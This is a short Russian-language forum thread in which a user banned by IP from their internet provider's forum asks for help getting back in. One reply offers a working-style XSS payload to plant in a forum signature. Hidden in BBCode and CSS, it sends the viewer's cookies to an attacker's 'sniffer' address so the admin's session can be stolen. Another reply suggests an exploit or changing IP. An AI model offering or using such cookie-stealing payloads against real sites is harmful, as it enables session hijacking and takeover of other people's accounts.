У меня такая проблема меня на форуме забанили по Ip. Мой провайдер не разрешает мне использовать прокси (покрайне мере у меня не грузяться странички когда я использиваю их) Уже пробывал и проги для скрытия Ip но что то так ничего и не помагает. Ну когда совсем припечет то через диал ап только и захожу. Потомучто надо ето ко всему еще и форум моего провайдера. есть полезная инфа. Кто сможет помагайте советами по доступу к Форуму
Вот что он пишет когда я захожу!! : ПРЕДУПРЕЖДЕНИЕ IPB [2] load_template(CACHE_PATHskin_cache/cacheid_14/skin_global.php): failed to open stream: No such file or directory (Файл: /sources/functions.php. Строка: 500) И че делать??
Я конечно понимаю что вам прикольно так говорить но вы аваторку почитайте я еще только учусь так что если у когото есть подробный материальчик для идиотов почитать или если есть время сами разяснит!!! Сапасибо за внимание!! ЗЫ: надо учить ето моя будушая специальность а в универе нефига толкового не дают
1.Зарегся на форуме 2.Воткни в подпись хсс 3.От души нафлуди по форуму в разделах которые модерирует админ... Вот хсс'ка: Code: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="адрес сниффера"+document.cookie);`
Все бы вам флудить. НО! он забанен..как он напишет??? нужен сплойт. или чужими руками. и вапще..забанен по IP-смени его нах..